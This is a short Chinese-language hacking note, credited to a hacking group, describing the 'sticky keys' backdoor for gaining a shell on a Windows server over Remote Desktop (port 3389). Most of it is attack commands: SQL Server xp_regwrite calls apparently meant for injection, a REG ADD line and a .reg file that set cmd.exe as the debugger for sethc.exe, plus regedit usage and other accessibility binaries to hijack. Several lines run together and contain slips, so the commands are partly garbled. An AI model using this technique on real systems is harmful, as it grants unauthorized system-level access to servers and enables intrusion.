3389新思路
版权所有:BK瞬间群
作者:BK群某饮料
1.能修改注册表
2.能访问3389
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';--REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /fWindows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe]
"debugger"="c:\\windows\\system32\\cmd.exe on"regedit
/s 导入 .reg 文件进注册表(安静模式)
/e 导出注册表文件
例:regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM
magnify.exe
osk.exe
sethc.exe
